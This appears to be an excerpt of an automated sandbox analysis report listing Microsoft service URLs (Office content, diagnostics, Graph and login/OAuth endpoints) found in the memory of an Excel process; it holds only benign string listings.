    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://graph.ppe.windows.net
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://graph.ppe.windows.net/-
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://graph.windows.net
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://graph.windows.net/
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://hubble.officeapps.live.com
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://hubble.officeapps.live.com7
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://hubble.officeapps.live.comn
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580437283.0000000012F52000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494575204.0000000012F4C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: EXCEL.EXE, 00000001.00000003.382505599.0000000013048000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580901025.0000000013048000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetryOfficeOnlineContenthttps://insertmedia.
    Source: EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3ddI
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
    Source: EXCEL.EXE, 00000001.00000002.579029622.0000000012CD0000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
    Source: EXCEL.EXE, 00000001.00000003.382474617.000000001301A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439243495.000000001301A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434833888.0000000013019000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421041076.0000000013019000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494384383.000000001301A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.282412041.000000001301E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461524519.000000001301A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580829333.000000001301A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456076552.000000001301A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.422155036.0000000013019000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1rev=
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
    Source: EXCEL.EXE, 00000001.00000003.382474617.000000001301A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439243495.000000001301A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434833888.0000000013019000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421041076.0000000013019000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494384383.000000001301A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.282412041.000000001301E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461524519.000000001301A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580829333.000000001301A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456076552.000000001301A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.422155036.0000000013019000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580437283.0000000012F52000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494575204.0000000012F4C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: EXCEL.EXE, 00000001.00000003.382505599.0000000013048000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580901025.0000000013048000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?OfficeOnlineContentM365Iconshttps://hu
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://incidents.diagnosticssdf.office.comb
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://inclient.store.office.com/gyro/client
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://inclient.store.office.com/gyro/clientstore3
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://inclient.store.office.com/gyro/clientstoret
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://inclient.store.office.com/gyro/clienttx
    Source: EXCEL.EXE, 00000001.00000002.579029622.0000000012CD0000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveAppmG
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: EXCEL.EXE, 00000001.00000003.382505599.0000000013048000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580901025.0000000013048000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArtOfficeOnlineContentF
    Source: EXCEL.EXE, 00000001.00000002.579794121.0000000012E6D000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArtpB
    Source: EXCEL.EXE, 00000001.00000002.579794121.0000000012E6D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: EXCEL.EXE, 00000001.00000003.382505599.0000000013048000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580901025.0000000013048000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrMBI_SSL_SHORTssl.
    Source: EXCEL.EXE, 00000001.00000002.579794121.0000000012E6D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: EXCEL.EXE, 00000001.00000003.382505599.0000000013048000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580901025.0000000013048000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveMBI_SSL_SHORTssl.
    Source: EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: EXCEL.EXE, 00000001.00000003.382505599.0000000013048000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580901025.0000000013048000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmediaMBI_SSL_SHORTofficeapps.
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeechBearer
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://lifecycle.office.com
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://lifecycle.office.comMBI_SSL_SHORThttps://lifecycle.office.com
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://lifecycle.office.comP
    Source: EXCEL.EXE, 00000001.00000003.457638365.0000000015B63000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.438766538.0000000015B5F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581995527.0000000015B65000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.433266138.0000000015B66000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455106967.0000000015B5C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.458142250.0000000015B5C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421211798.0000000015B66000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.457152596.0000000015B5C000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com3333
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://login.microsoftonline.com/
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmpString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize?
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://login.windows.local
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.localtes
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize#
    Source: EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize$%
    Source: EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize%
    Source: EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize&
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize-
    Source: EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize.
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize0
    Source: EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize1
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize2
    Source: EXCEL.EXE, 00000001.00000003.422011923.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.435352332.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456373840.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.282488457.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581020691.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439375212.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494762665.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382579863.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461680797.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421133082.00000000130A6000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize3
    Source: EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize6
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize=
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize?
    Source: EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeC
    Source: EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeD
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeE
    Source: EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeF
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeG
    Source: EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeO
    Source: EXCEL.EXE, 00000001.00000003.422011923.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.435352332.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456373840.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.282488457.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581020691.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439375212.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494762665.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382579863.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461680797.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421133082.00000000130A6000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeP
    Source: EXCEL.EXE, 00000001.00000003.422011923.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.435352332.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456373840.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.282488457.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581020691.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439375212.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494762665.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382579863.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461680797.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421133082.00000000130A6000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeQ
    Source: EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeU
    Source: EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeV
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeW
    Source: EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeb
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizec
    Source: EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorized
